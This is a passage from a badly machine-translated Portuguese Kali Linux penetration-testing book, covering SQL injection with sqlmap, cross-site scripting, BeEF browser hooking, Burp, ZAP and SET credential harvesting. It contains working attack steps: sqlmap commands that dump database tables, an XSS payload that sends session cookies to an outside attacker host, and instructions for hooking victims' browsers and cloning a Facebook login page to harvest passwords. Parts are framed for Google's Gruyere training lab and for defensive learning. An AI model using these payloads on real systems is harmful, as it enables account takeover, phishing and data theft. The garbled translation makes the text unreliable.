No entanto, voc pode ver injees SQL so muito valiosos para o ataque, porque eles
dar um verificador da penetrao da web um mtodo fcil para obter acesso total a um
sistema.
Sucesso injeo de SQL dependente do conhecimento atacantes de comandos SQL. Se
voc precisa escovar acima em suas habilidades de SQL, recomendamos olhando W3 School of SQL
em: http://www.w3schools.com/sql/sql_intro.asp.
SqlMap
SqlMap automatiza o processo de deteco e explorao de falhas de injeo SQL e
tomando conta de servidores de banco de dados. SqlMap vem com um mecanismo de deteco,
bem como um
ampla gama de recursos de testes de penetrao que variam de banco de dados de impresses
digitais
para acessar o sistema de arquivos subjacente e executar comandos no sistema operacional
sistema atravs de ligaes de fora-de-banda.
Os recursos incluem suporte para sistemas de gerenciamento de banco de dados comum, o apoio

muitas tcnicas de injeo SQL, usurios, enumerando os hashes de senha, e muitos
outros. SqlMap tambm apoia o processo de banco de dados 'user escalonamento de privilgios
usando
Meterpreter do Metasploit getsystem comando.
SqlMap uma ferramenta que pode ser usada para explorar servidores de banco de dados e
construdo em Kali. Para
SqlMap usar, voc vai precisar para apontar a ferramenta para uma URL de um script SQL em um
servidor web.
Estes podem ser identificados porque eles geralmente tm php na URL.
Voc pode encontrar SqlMap sob Anlise Vulnerabilty |Avaliao do banco de dados |
SqlMap. ATerminal janela ser aberta exibindo a pgina SqlMap ajuda.
A sintaxe bsica para usar SqlMap :
SqlMap-u URL - funo
Uma funo comum dbs. O dbs palavra-chave ter SqlMap obter os bancos de dados.
SqlMap-u http://www.drchaous.com/article.php?id=5 - dbs
Voc pode ver a partir de nossos resultados, temos vrias bases de dados que foram
encontrados. Para esta
exemplo, vamos concentrar-se no banco de dados de teste.
[203]
Atacando Autenticao
Depois de ter encontrado um servidor web vulnervel, voc seleciona o banco de dados usando o
-D comando e o nome da base de dados.
SqlMap-u teste http://www.drchaos.com/article.php?id=5-D - tabelas
O mesa palavra-chave usada para recuperar todas as tabelas no teste banco de dados em nosso
web
servidor. Vemos que temos recuperado com xito duas tabelas, administrador e contedo.
Uma vez que voc execute o seguinte comando, SqlMap ir exibir todas as tabelas:
SqlMap-u http://www.drchaous.com/article.php?id=5 Teste D-- tabelas
Colunas especficas podem ser selecionados usando o seguinte comando:
SqlMap-u http://www.drchaous.com/article.php?id=5
- colunas
-T tablesnamehere
Se houver alguma informao relevante nas tabelas, ele pode ser recuperado usando o
seguinte comando:
SqlMap-u http://www.drchaous.com/article.php?id=5
teste - despejo
-U teste-dump
-T-L tablesnamehere
Isso ir criar um arquivo chamado teste, E despejar toda a informao bruta do
tabela de banco de dados para esse arquivo. Em muitos casos, isso pode incluir senhas e
outras
informaes confidenciais.
Cross-site scripting (XSS)
Cross-site scripting (XSS) uma vulnerabilidade encontrada em aplicaes web. XSS permite
atacantes para injetar os scripts no site. Esses scripts podem ser usados para manipular
o servidor web, ou os clientes que se conectam ao servidor web.
Cross-site scripting foi responsvel por uma grande maioria de ataques baseados na web populares.
Muitas vezes, quando minha equipe solicitada pelos clientes para examinar comprometida
servidores web que tiveram dados roubados, foi resultado de cross-site scripting.
Ataques cross-site scripting resultaram em atacantes desfigurar sites, distribuindo
malwares para os clientes, e roubar informaes sensveis a partir de sites, como o crdito
carto e outras informaes de identificao pessoal.
[204]
Captulo 5
Um mtodo para verificar se h vulnerabilidades cross-site scripting verificar se uma entrada
campo, como uma caixa de pesquisa, vulnervel. Um exemplo que pode ser utilizado para testar
um
campo de entrada em um site est usando a seqncia de pesquisa simples da seguinte maneira:
CHAOS <script> alert ('www.DrChaos.com') </ script>
Voc pode usar o script anterior para testar qualquer site no entanto, no recomendamos
introduzir a corda em cada site que voc se deparar, como poderia alertar as metas de seu
intenes maliciosas. Se voc optar por usar um script semelhante para testar cross-site scripting,
certifique-se de usar um outro site que no seja www.DrChaos.com no script.
Testando cross-site scripting
Google criou o projeto Gruyere como um meio para testar exploits aplicao web
e defesas. site O projeto Gruyere tem vrias vulnerabilidades embutidos
para ele, incluindo XSS. Voc pode executar o seu prprio projeto de Gruyere on-line, ou voc
pode
transferi-lo para uma mquina local para o seu teste.
Uma vez que foram registrados em nossa prpria instncia de Gruyere, fomos capazes de copiar o
seqncia anterior no campo de entrada nome de usurio e clicar no Submeter boto. O
imagem seguinte mostra a home page com o Gruyere CHAOS roteiro exibido.
A cadeia utilizada no campo de entrada a seguinte:
CHAOS <script> alert ('www.DrChaos.com') </ script>
[205]
Atacando Autenticao
Uma vez que executou o script de XSS no campo de entrada nome de usurio, notamos algum
cdigo foi
exibido no site. Neste ponto, ns fomos capazes de gerar um alerta pop-up
sempre que o nome de usurio era visto no site.
Alm disso, http://xss.progphp.com/ um outro site popular para testar ataques XSS
e scripts. Voc pode ter vrios scripts e introduzi-lo no site para ver como
XSS interage com sites e seu prprio navegador web de forma segura.
Cookie de XSS roubo / Autenticao
seqestro
Script kiddies pode usar XSS para a gerao de alertas pop-up no entanto, como um profissional
Verificador da penetrao, o valor real de XSS para obter acesso privilegiado a um sistema.
A prxima seo ir examinar como fazer isso. Se voc no tiver feito isso, criar
seu prprio exemplo Gruyere online para testar conceitos a prxima seo.
Navegue at http://google-gruyere.appspot.com/start. App Engine ser iniciado
uma nova instncia de Gruyere para voc, atribuir-lhe uma identificao nica e redirecion-lo para
http://google-gruyere.appspot.com/123456/ (Onde 123456 o nico
ID para este exemplo).
Cada instncia de Gruyere est completamente isolado de todos os outros casos, para que o seu
instncia no ser afetado por qualquer outra pessoa usando Gruyere. Voc precisa usar o seu
identificao nica, em vez de 123456 em todos os exemplos.
Se voc quiser compartilhar o seu trabalho e projeto de concluir em Gruyere com algum
outra coisa (por exemplo, para mostrar-lhes um ataque bem-sucedido), basta compartilhar a URL
completa com
seu amigo, incluindo a sua identificao nica.
No use a mesma senha para sua conta Gruyere como voc usa para qualquer servio real.
Vamos examinar um exemplo do uso de uma vulnerabilidade XSS para roubar um cookie de sesso.
Se voc tentar esta tcnica em uma rede local, o Kali caixa e servidor web vulnervel
deve ser capaz de comunicar. Como estamos usando projeto Gruyere, precisvamos
colocar nossa caixa de Kali Linux na Internet com um endereo IP voltados ao pblico, de modo Kali
Linux
pode se comunicar corretamente com o servidor Gruyere alvo.
[206]
Captulo 5
Normalmente, dando Kali Linux um endereo IP pblico realmente uma m
prtica. Executar este passo pode significar a abertura de firewalls e
tendo Kali Linux exposta a ataques remotos.
Quando voc entrar em Gruyere, crie um nome de usurio, clicando no Inscrever-se boto
na tela lado superior direito, como mostrado na imagem seguinte:
Para este exerccio, criamos duas contas separadas. Vamos entrar com a primeira conta.
Para o nosso exemplo, a nossa primeira conta intitulado TheDude. Em seguida, vamos para o trecho
seo e criar um novo trecho. Iremos introduzir um script de XSS aqui como mostrado na
tela a seguir:
Sabemos Gruyere tem vulnerabilidades XSS embutido, e, portanto, estamos usando
um script. No mundo real, podemos usar o mesmo script em qualquer campo em um alvo
site para testar se vulnervel a XSS. Por exemplo, se soubssemos Facebook foi
vulnervel a um ataque XSS explorar o campo nome do meio, um invasor
precisa criar um perfil e usar este script como o seu nome do meio.
[207]
Atacando Autenticao
Facebook no explorvel usar este ataque. apenas um exemplo hipottico.
Entramos no seguinte cdigo:
<script> document.write ("<img src = 'http://kali.drchaos.com/var/www/xss_
laboratrio / lab_script.php? "+ document.cookie +"> ") </ script>
Embora as palavras pode envolver em torno de como voc digitar o comando, ele precisa
ser um nico comando de linha.
Este apenas um dos muitos scripts que podem ser usados para explorar um sistema vulnervel.
O foco deste livro est alavancando ferramentas disponveis no Kali Linux, no entanto, o melhor
Testadores de penetrao usam uma variao de ferramentas disponveis do setor, como Kali Linux,
e
ferramentas personalizadas, como scripts XSS de violao alvos. Sugerimos a investigar este tema
e testar novos scripts contra o seu alvo exemplo Gruyere para dominar a habilidade de
construir e executar ataques de script personalizado.
Outras
ferramentas
urlsnarf
Aqui esto algumas outras ferramentas que seguem o tema deste Chatper e disponvel em Kali
Linux:
urlsnarf uma ferramenta que gera todas as URLs solicitadas cheirou de trfego HTTP em
Formato de log comum (CLF, usado por quase todos os servidores web), adequado para off-line
ps-processamento com o seu web log anlise ferramenta favorita (analgico, wwwstat e
assim por diante).
Para acessar urlsnarf, navegue at Sniffing / Spoofing |Sniffers de rede e
selecionar urlsnarf. A Terminal ir aparecer apresentando opes de uso, como mostrado na
a tela a seguir:
Para usar urlsnarf, tipo urlsnarf-i ea interface que voc deseja monitorar. urlsnarf
ir mostrar que est ouvindo. Esta captura de tela a seguir mostra urlsnarf lista para eth0:
[208]
Captulo 5
urlsnarf ir exibir um dump de qualquer pedido de URL visto no fio. Por exemplo,
um usurio de Windows acessos www.thesecurityblogger.com. As solicitaes de URL so
apresentado em urlsnarf para uso futuro.
acccheck
acccheck uma ferramenta de ataque de dicionrio senha que tem como alvo a autenticao do
Windows
utilizando o protocolo SMB. acccheck um script invlucro em torno do binrio smbclient,
e, como resultado, dependente dele para a sua execuo.
hexinject
hexinject um injetor pacote verstil e sniffer que fornece uma linha de comando
estrutura para o acesso rede cru. hexinject projetado para trabalhar em conjunto com outros
utilitrios de linha de comando, e por esta razo que facilita a criao de poderosos
shell scripts capazes de leitura, interceptar e modificar o trfego da rede em
de forma transparente. hexinject pode injetar qualquer coisa na rede, bem como
calcular os campos de checksum e tamanho do pacote de protocolos TCP / IP.
[209]
Atacando Autenticao
Patator
Patator um multi-purpose utilitrio de fora bruta, com um design modular e flexvel
uso. Capacidades do patator incluem FTP, SSH-forando bruta, Telnet, SMTP, HTTP /
HTTPS, POP, IMAP, LDAP, SMB, MSSQL, Oracle, MySQL, DNS, SNMP, e
arquivos de senha.
DBPwAudit
DBPwAudit realiza auditorias on-line de qualidade de senha para vrios banco de dados
motores. O aplicativo projetado para permitir a adio de drivers de banco de dados adicionais
copiando novos drivers JDBC para o JDBC diretrio.
Resumo
Comprometer autenticao permite que um atacante passar por uma pessoa autorizada.
Isto pode ser til quando as aplicaes web de teste de penetrao, porque ter
acesso autorizado significa ignorar a maioria das defesas de segurana tradicionais.
Captulo 5, Atacar de autenticao, focado em atacar como os usurios e sistemas
autenticar. Comeamos, fornecendo uma viso geral dos diferentes mtodos utilizados
para confirmar a identidade. A prxima seo coberto atacar o processo de gesto
sesses de autenticao. Em seguida, avaliou-se como os dados de sesso armazenado em um
usurio de
navegador por comprometer a gesto cookie. Ns, ento, coberto como capturar
as sesses de autenticao por escondendo entre os alvos utilizando vrias formas de man-in-the-
um ataque pelo meio. Vulnerabilidades de autenticao As duas sees finais avaliadas web
servidores de aplicaes, tais como injeo de SQL e cross-site scripting.
O prximo captulo ir cobrir ataques remotos ou da Internet para servidores e clientes.
[210]
Ataques na Web
O foco deste captulo ser sobre ataques baseados na Internet. Os administradores de segurana
para as organizaes esto conscientes de que h partidos maliciosos na Internet,
continuamente procura de maneiras de penetrar qualquer rede que se deparar e em
defesa, os administradores tm medidas de segurana no local. Defesas comuns incluem
Firewalls, IPS / IDS, produtos de segurana baseados em host, como anti-vrus, filtros de contedo,
etc No passado, essas defesas foram suficientes, no entanto, as ameaas esto se tornando mais
sofisticado hoje em dia, com a capacidade de contornar comercial da prateleira ou
solues de segurana "COTS". As ferramentas abordadas neste captulo incluem mtodos
Kali Linux, utilizado para contornar as defesas de segurana padro a partir de uma localizao
remota.
Este captulo termina arsenal de ataque do verificador da penetrao. Aps analisar o material
coberto nos captulos anteriores, voc deve entender como conduzir reconhecimento
em um alvo, identificar vulnerabilidades do servidor e do lado do cliente, e as tcnicas utilizadas para
explor-los. Este captulo ir cobrir o elemento final de ataque relacionado ao uso de web
aplicaes como um front-end. Alm disso, vamos explorar como tirar proveito do
prprio servidor web e de compromisso aplicaes web usando exploits, como navegador
ataques de explorao, ataques de proxy e colheita senha. Ns tambm ir abranger
mtodos para interromper servios utilizando tcnicas de negao de servio.
Explorao Navegador Quadro - Carne
Ataques na Web
Vulnerabilidades do browser pode ser explorada por um software malicioso para manipular o
o comportamento esperado de um navegador. Essas vulnerabilidades so um vetor de ataque
popular,
porque a maioria dos sistemas de acolhimento alavancar algum tipo de software navegador de
Internet. Vamos
dar uma olhada em uma ferramenta popular desenvolvido para explorar vulnerabilidades do
navegador.
H muitas aplicaes de teste de penetrao legais que devem ser includos em
seu arsenal de hackers, como um dos nossos favoritos conhecido como Explorao Navegador
Quadro (Carne). A carne bovina um pacote baseado em navegador explorar esse "ganchos" um ou
mais
navegadores como cabeas de ponte para o lanamento de ataques. Um usurio pode ser ligado
atravs do acesso a
URL personalizado e continuar a ver o trfego da web tpico, enquanto que um atacante tem acesso
para a sesso do usurio. Beef ignora appliances de segurana de rede e host-based, anti-
aplicaes de vrus visando os vulnerabilidades encontradas em navegadores comuns, tais como
Internet Explorer e Firefox.
Carne bovina no est includo com a verso 1.0 do Kali Linux, mas pode ser encontrada
em
beefproject.com. Esperamos carne bovina para ser adicionado em uma verso futura do Kali
Linux com base em sua popularidade na comunidade de testes de penetrao.
Para instalar a carne, abra um terminal de comando em Kali Linux como usurio root e emisso
os seguintes comandos:


apt-get update
apt-get install carne-XSS
Voc pode ser solicitado a instalar, atualizar ou substituir alguns arquivos mais antigos quando voc
executar o
apt-get update comando. Na maioria dos casos, voc pode simplesmente aceitar as instrues padro.
Quando o processo de atualizao for concludo, voc pode usar apt-get instalar Beef:
Uma vez que o processo for concludo, voc ter de carne bovina instalado no Kali Linux.
[212]
Captulo 6
Para iniciar a carne, navegue at / Usr / share / carne-XSS diretrio e tipo . / Carne para iniciar
o servidor de carne bovina. Uma vez que comea a carne bovina, as URLs para gerenciar Carne de
gancho vtimas vontade
ser exibido na janela de terminal:
Para acessar o servidor de administrao, abra um navegador e v para a / Ui / painel
URL. Quando enganando a vtima para ser fisgado por carne bovina, redirecionar as vtimas para o
URL do servidor gancho de carne bovina listados como hook.js. Voc vai precisar para desenvolver
uma estratgia para obter
as vtimas para acessar sua URL gancho, como um phishing ou ataque de engenharia social,
que redireciona os usurios para carne bovina.
[213]
Ataques na Web
Neste exemplo, iremos para: http://172.16.86.144:3000/ui/panel. Padro
nome de usurio e senha so carne bovina.
Quando a vtima clica ou redirecionado para o site "hook.js", o atacante do
Servidor Beef ver o navegador viciado. Beef ir adicionar o novo sistema para uma lista de
metas e exibi-las se a vtima viciado online. Desconectado vtimas se tornaro
vulnervel a ataques, uma vez que se reconectar Internet, independentemente se eles acessam
o link gancho antes de voltar a usar a internet. A prxima imagem mostra principal de carne bovina
painel de instrumentos e opes disponveis para lanar contra um sistema viciado:
[214]
Captulo 6
O exemplo anterior mostra um laptop ligado do Windows. Carne bovina pode revelar os detalhes,
por exemplo, se a vtima est usando o Firefox, o Windows 32, plugins de navegadores especficos,
scripts, se o Java est ativado e outras informaes teis. O atacante pode
executar comandos em mquinas em forma de gancho, como fazer um som carrilho, sesso grab
cookies, capturas de tela captura, registrar as teclas digitadas, e at mesmo usar o navegador viciado
como
um proxy para atacar outros sistemas. Outro exemplo ter o registro do sistema viciado
no Facebook e usando carne bovina para capturar o cookie de sesso. Um atacante pode responder
para a sesso autenticada e ter acesso total a conta do Facebook da vtima.
As possibilidades para o mal ea destruio so infinitas. Esta cabea de ponte poderia permitir que
um
atacante acesso irrestrito para o navegador do usurio e todas as informaes que necessrio para
acess-lo.
Carne bovina fornece os detalhes dos sistemas de gancho e registra os comandos que so
executado. Ambos os detalhes dos hosts individuais e log de comando executado com sucesso
informao pode ser copiado para um relatrio final final:
[215]
Ataques na Web
Defendendo contra ferramentas de penetrao baseados em navegador difcil. A melhor defesa
garantir que todos os softwares baseados em navegador atualizado com as ltimas verses e
patches de segurana, juntamente com a desativao do navegador de executar Flash e Java. Em
solues disso, de segurana que podem detectar ameaas baseadas em aplicaes comuns, tais
como Prxima Gerao de Intruso Sistemas de Preveno (NGIPS) pode fornecer um extra
camada de segurana. A maioria das vtimas de ferramentas de penetrao, como carne bovina so
usurios
que clicar em links includos em e-mails ou convidados de mdia social que se apresentam como
uma parte confivel
compartilhando coisas envolvidas com links maliciosos / software / cdigo e assim por diante.
FoxyProxy - Plugin do Firefox
Se voc planeja usar proxies para testar aplicaes web, como Zed Proxy Ataque
(ZAP) ou BURP, voc pode querer usar o plugin do Firefox FoxyProxy para simplificar
alternando entre, bem como permitir o uso de Proxy. FoxyProxy uma extenso do Firefox
que permite que voc gerencie facilmente, mudana, habilitar ou desabilitar as configuraes de proxy
no Firefox.
Voc pode baixar FoxyProxy do Firefox add-on biblioteca.
Uma vez FoxyProxy est instalado, haver um cone adicionada no topo do Firefox
janela do navegador. Clique sobre isso para abrir a caixa de dilogo Opes FoxyProxy:
[216]
Captulo 6
Para adicionar um proxy para FoxyProxy, faa o seguinte:
1. Clique no Adicionar Novo Proxy boto, e uma nova janela ser aberta.
2. Selecionar Configurao manual do proxy.
3. Digite o endereo IP ou host eo nmero da porta do servidor proxy.
4. Clique em Ok para salvar o novo proxy.
Neste ponto, FoxyProxy est desativado permitir todo o trfego sem um proxy no lugar, como
estabelecido Desabilitar completamente o FoxyProxy no separador superior. Para usar um proxy,
clique na guia
e alter-lo para o seu proxy desejado. Esta caracterstica faz com que seja fcil para alternar entre ou
desativar proxies no Firefox rapidamente:
[217]
Ataques na Web
BURP Proxy
Arroto Procurao uma ferramenta que intercepta trfego HTTP e HTTPS. Ela permite uma
penetrao
Testador ao analisar um pedido, suas vulnerabilidades, eo de duas vias de trfego entre
um cliente e um servidor web. Arroto Procurao muito popular por causa de sua capacidade de
no
s examinar o trfego, mas tambm, ele manipula solicitaes. Vamos examinar como
Arroto Procurao usado para manipular, responder e roubar autenticao.
importante lembrar que o arroto Procurao realmente uma parte de Burp Suite, que
uma coleo de ferramentas. Quando um usurio digita uma URL no seu navegador da Web, como
http://
www.DrChaos.com, Eles esperam para ser direcionado para o site. Um servidor proxy
interceptar esse pedido e envi-lo em nome de um cliente. Os servidores proxy so normalmente
postas em prtica para inspecionar o trfego e proteger os clientes a partir de dados nocivos. Como
Verificador da penetrao, voc pode usar um servidor proxy para interceptar o trfego de um cliente,
copie
o pedido, ou manipul-lo:
Pergunte o que Bob
o tempo atual
O que
o tempo atual
Alice Procurao Prumo
Bob diz que a
o tempo 07:00
O tempo
7:00
Para iniciar Burp Suite, basta navegar at: Barrilha |Sniffing / Spoofing |Sniffers Web
e selecione Burp Suite.
[218]
Captulo 6
Uma vez Arroto Suite lanado, voc ser presenteado com o painel de instrumentos lanamento
Burp:
Para configurar Burp, clique no Procurao guia. Por padro, o Interceptar boto selecionado
neste guia. Quando o Interceptar opo ativada, Burp pra todos os pedidos a partir de um
navegador para o servidor web. O recurso permite que um verificador da penetrao a capacidade de
examinar uma ligao. O verificador da penetrao pode permitir manualmente a conexo com
continuar uma vez que visto.
O Interceptar boto exige a interveno manual, ou o pedido ser
nunca faz-lo para o servidor web.
A prxima configurao encontrado na Opes submenu. Esta seo
permitem aos usurios verificar ou alterar a porta padro em que Burp est em execuo, bem como
configurar a interface de rede ou visto pelo arroto. Por padro, o arroto definido para ser executado
no
interface de auto-retorno, como mostra a imagem a seguir. A interface loopback um
interface especial que geralmente tem o endereo IP do 127.0.0.1 associada com ele. Faz
no tem uma conexo de hardware fsico vinculados a ela, mas um caminho para a operao
sistema de referncia prprio. Em outras palavras, quando voc quer se comunicar com
-se em rede, voc pode usar um auto-retorno. Se voc est pensando em testes Arroto Suite
alm da mquina local, voc deve adicionar a sua interface Ethernet e endereo IP.
[219]
Ataques na Web
Vamos usar a interface de loopback para o nosso exemplo:
O prximo passo configurar o navegador para usar Burp Suite. Todos os navegadores tm
uma
de forma semelhante usando um servidor proxy. No prximo exemplo, temos representado o
definies para configurar um servidor proxy no Firefox:
Por exemplo a seguir, iremos para um URL, como www.DrChaos.com em
Firefox. Voc vai notar que nada acontece. Isto porque o Interceptar caracterstica
ativado por padro, como discutimos anteriormente. Agora voc pode ver a Interceptar guia em
Burp mudou as cores para indicar um novo pedido foi interceptada.
[220]
Captulo 6
Quando voc clica no Interceptar guia, voc vai ver a natureza exata do pedido.
Agora voc pode clicar em Para a frente ou Cair para permitir ou negar o pedido especificamente
de continuar:
Quando voc clica no Para a frente boto, voc ver o pedido de continuar
para o servidor, assim como a resposta a partir do servidor. Alm disso, voc deve ver o
webpage carregado com xito no navegador da web. Algumas pginas web tm mltiplas
componentes, de modo que voc pode precisar para selecionar o Para a frente boto vrias vezes
antes
as cargas de pgina web.
Outro recurso interessante Burp Spider. Arroto Aranha oferece uma forma de mapeamento
web
aplicaes em uma forma automatizada. Como Burp Aranha obras que primeiro
configurao Burp a procurao seu uso da Internet, como tnhamos explicado anteriormente.
Em seguida, voc
permitir Burp Aranha, e enquanto ele estiver sendo executado, Burp ir mapear todas as
solicitaes e
oferecem a possibilidade de aranha qualquer pedido capturado para encontrar novos alvos.
Para usar o Aranha, clique no Aranha aba para abrir a pgina de configurao padro.
Clique no Aranha est em pausa boto para alterar o status para Aranha est em execuo:
[221]
Ataques na Web
Burp mapeia todas as solicitaes de visto pelo proxy sob a Alvo guia. Clique no Alvo
guia para ver o que foi capturado. Haver uma lista de alvos que esto sendo usados
no proxy. URLs que esto em cinza significa que voc no tenha pesquisado diretamente os
alvos, enquanto URLs em preto so os locais em que foram explicitamente navegou:
Para usar o Aranha funo, clique com o boto direito em um alvo e selecione Aranha este
host:
[222]
Captulo 6
Quando voc vai para o Aranha guia no arroto, voc vai notar a Aranha Estado contagem
mudaram desde 0para um nmero de acumular:
Se Burp encontra qualquer forma, ele ir pedir-lhe para preencher os formulrios ou ignor-los.
Se voc preencher os formulrios, Burp continuar a ver o que mais ele pode aranha em pginas
alm das formas:
[223]
Ataques na Web
Quando o Aranha processo estiver concludo, volte para Alvos guia e encontrar o host que voc
originalmente selecionado para aranha. Clique no tringulo ao lado do anfitrio para expandi-lo.
Voc
vai ver todos os resultados de aranha sob o seu alvo original:
Burp mostra todas as pginas e links que o Aranha processo foi capturado. Alm disso, ele
ir capturar o diretrio raiz, estilos de pgina web, sub-pastas e scripts Java. O
prximo exemplo mostra vrias, sub-pastas capturados no site www.Drchaos.com.
[224]
Captulo 6
Burp tem a capacidade de filtrar os itens usando o cinza Filtro bar no topo da pgina.
Quando voc clica no Filtro boto, ele vai expandir as opes disponveis para
filtrar os resultados:
O Aranha opo em Burp permite um verificador da penetrao da web para ver como a web
aplicao ou um site configurado, o que os links so contidos, e para onde
esses links levam. Uma analogia deste conceito estar em uma sala com muitas portas
e tendo a capacidade de explorar cada porta simultaneamente.
OWASP - ZAP
ZAP um fcil de usar, integrado ferramenta teste de penetrao para encontrar o
vulnerabilidades em aplicaes web. Ns fornecemos uma breve viso geral de como usar
ZAP em Captulo 3 sobre a digitalizao de um alvo para possveis vulnerabilidades. Vamos
revisitar ZAP para identificao e explorao de cross-site scripting (vulgarmente designado
como XSS) vulnerabilidades.
ZAP vem embutido no Kali Linux 1.0, e pode ser encontrado em Sniffing / Spoofing |
Sniffers Web e selecionando OWASP - ZAP, ou simplesmente abrir uma janela de terminal
e digitar zap, como mostrado no exemplo a seguir:
[225]
Ataques na Web
Aqui est um resumo da criao de ZAP com o Firefox, como explicado no Captulo 3:
1. Aceite o acordo de usurio.
2. Gerar um certificado SSL ou importar um j existente.
3. Importe o certificado em um navegador web como o Firefox, v em
Preferncias |Avanado e selecionando a Criptografia sub-seo.
4. Clique em Exibir Certificados e importar o certificado.
5. Confira todas as opes de confiana para o uso do novo certificado.
6. Configure seu navegador de Internet para usar ZAP como o proxy padro. No Firefox,
isso encontrado em Preferncias |Avanado |Rede.
7. Digite o servidor proxy localhost eo nmero da porta 8080, Que o
padro para o proxy ZAP.
8. Marque a caixa para usar o servidor proxy para todos os protocolos.
Voc vai precisar para gerar um certificado antes de poder usar ZAP.
Uma vez ZAP e Firefox so configurados, carregar qualquer URL no Firefox. Voc vai ver o
sites agora esto aparecendo na ZAP sob o Sites guia. Neste exemplo, ns fomos
para www.DrChaos.com e percebi que temos muito poucos sites que foram carregados porque
de todos os links na www.DrChaos.com pgina:
ZAP tem a opo de executar scanners ativos ou passivos. Scans passivos no executar
ataques e deve ser seguro para ser executado em qualquer aplicao web. Varreduras ativas
executado um nmero
de ataques e esto funcionando ativamente cdigos contra aplicaes web, o que pode
disparar alarmes para determinados produtos de defesa de segurana.
[226]
Captulo 6
O exemplo a seguir estar usando ambos os scans ativa e passiva. uma boa idia
ter um servidor web que voc pode testar em vez de tentar ZAP em um no autorizado
servidor. Porque queremos praticar em um servidor web vulnervel estamos autorizados
para o teste, vamos voltar a usar o Google Gyuyere projeto.
Google criou o projeto Gruyere como um meio para testar exploits aplicao web
e defesas. site O projeto Gyuyere tem vrias vulnerabilidades embutidos
para ele, incluindo XSS. Voc pode executar o seu prprio projeto de Gruyere on-line, ou voc
pode
transferi-lo para uma mquina local para o seu teste:
Crie a sua prpria instncia de Gruyere para testar ZAP. Quando voc fizer isso voc vai ser dada
seu prprio URL nico. Foi-nos dada http://google-gruyere.appspot.
com/326352883334 / para o nosso URL.
Ns vamos voltar a ZAP e fazer uma varredura rpida deste URL:
[227]
Ataques na Web
O exemplo a imagem mostra um grupo de SEED arquivos, incluindo um que
curiosamente rotulada: http://google-gruyere.appspot.com/326352883334/
invlido.
Quando colocamos isso em um navegador, obtemos a seguinte mensagem de erro:
Quando se trata de XSS, os personagens mais perigosos so uma URL <e >. Se um
hacker pode obter um aplicativo para inserir o que eles querem em uma pgina usando <e >
diretamente, que abre uma porta para injetar scripts maliciosos. Aqui esto alguns outros
interessante SEED arquivos:
[228]
Captulo 6
Aqui est um exemplo de tirar proveito de um desses SEED links por injeo de um
script. Vamos criar um URL e adicione o alert (1) script para ver se o site vai
criar um erro de pop-up:
http://google-gruyere.appspot.com/326352883334/
alerta <script> (1);
</ Script>
O exemplo mostra o nosso problema de servidor de aplicao web alvo uma prova de contexto
que
este site vulnervel a um ataque. Podemos usar ZAP para repetir o ataque, tente outro
ataques ou mtodos de ensaio XSS similares.
Recomendamos a brincar com os erros que voc encontrar e ver se voc pode manipular
-los para gerar uma sada sensvel para seus exerccios de testes de penetrao. O Gruyere
projeto uma tima maneira de testar suas habilidades de encontrar outras vulnerabilidades usando
ZAP.
Para se defender contra ataques remotos, ZAP pode ser timo para testes de vulnerabilidades web,
tais
como ataques XSS. Algumas pessoas acreditam que os usurios no precisam se preocupar com
XSS
quando navegar em sites se o navegador anuncia que tem capacidades de defesa XSS.
A verdade por trs desse conceito que a confiana na proteo do navegador no pode ser perfeito,
com base
no princpio de que os navegadores no esto cientes de quo seguro o cdigo est por trs da
aplicao web. Hackers inteligentes pode ser capaz de contornar essa proteo, tais como
explorando uma vulnerabilidade de XSS e emitir os scripts contra as foras que visitam o site.
Melhores prticas para proteger seu servidor e os clientes acessar seus aplicativos
identificando e corrigindo vulnerabilidades usando uma ferramenta como o ZAP.
[229]
Ataques na Web
Colheita senha SET
Foram examinados os fundamentos da Engenharia Social Toolkit (SET) em Captulo 4. Estamos
vai revisitar SET e olhar para alguns conceitos avanados de colheita e senha
captura de informaes privilegiadas.
Como um lembrete, vamos lanar SET, indo para Ferramentas de Explorao |Social
Ferramentas de engenharia |se-toolkit.
Certifique-se SET atualizado se isso se a primeira vez de us-lo. Passos para atualizar SET
e verificar se GIT est instalado pode ser encontrada em Captulo 4.
Quando SET clones de um site, ele ir executar um servidor web. importante
que quem est sendo alvo capaz de conectar ao seu servidor web.
Isto significa que qualquer ataque baseado na Internet ter de alavancar um pblico
Endereo IP (ou atravs de NAT ou directamente sobre Kali Linux), bem como
abertura de regras de firewall para permitir o acesso a Kali de um local remoto.
Depois de ter tomado o cuidado de todas as configuraes de IP, hora de lanar SET:
Vamos agora usar SET para colher senhas. SET tem a capacidade de clonar qualquer site
voc quer. Estamos realmente indo para escolher um dos engenharia social mais popular
sites neste exemplo clonar. Concordar em qualquer contrato de licena que voc pode se deparar
com SET:
[230]
Captulo 6
Selecionando a opo 5 recomendado para atualizar SET antes de usar a ferramenta
para garantir que voc tenha as ltimas atualizaes. Se voc receber um erro informando
no
Existem repositrios Git, voc pode ter instalado GIT incorretamente ou o
passos mudaram desde a escrita deste texto. Consulte a editora de
site, blog do Aamir Lakhani em www.DrChaos.com ou Jos Muniz de
blog em www.thesecurityblogger.com para mais truques sobre como usar SET
Kali com Linux.
1. Uma vez que SET atualizado, selecione a opo 1 para ataques de engenharia
social-.
2. Selecione a opo 2 para Vetores de Ataque Site
3. Selecione a opo 3 para Credencial Harvester Ataque
Voc tem algumas opes de como voc deseja clonar um site. SET tem modelos para
sites populares, como Facebook e Gmail. s vezes, esses modelos no funcionam;
no entanto, recomendvel comear com estes ou clonagem de outro site. Para clone
um site, voc precisa de um URL, e SET ir automaticamente tentar clon-lo.
Se voc j tiver um site clonado ou se os arquivos HTML carregado no Kali, voc pode
selecionar importao personalizada. Ao selecionar esta opo, voc precisa dizer onde Kali
os arquivos HTML esto localizados no sistema de arquivos local.
[231]
Ataques na Web
Para o nosso exemplo, vamos escolher modelos de web. SET vai perguntar sobre o endereo IP
deve escutar. Este ser o endereo IP para a interface em Kali Linux. O
exceo a isso quando se usa NAT em um firewall. Nesse caso, voc vai precisar usar
o NAT ou o endereo pblico, em vez de endereo IP na Kali Linux para que as metas podem
acessar o sistema. O prximo exemplo usar o endereo de loopback local 127.0.0.1.
Em seguida, SET vai pedir para selecionar um modelo. Para este exemplo, vamos selecionar
Facebook.
O prximo exemplo mostra um navegador indo para 127.0.0.1 e exibindo o nosso falso
Facebook page. Se uma pgina modelo no parece muito bem, voc pode querer usar um
diferente modelo ou clonar a pgina desejada:
Observe nossa estados barra de endereo 127.0.0.1. Normalmente, voc precisar usar algum outro
vetor de ataque para enganar os usurios para ir para o seu site. H inmeras maneiras de fazer isso,
como enviar-lhes um link ou um e-mail falso:
[232]
Captulo 6
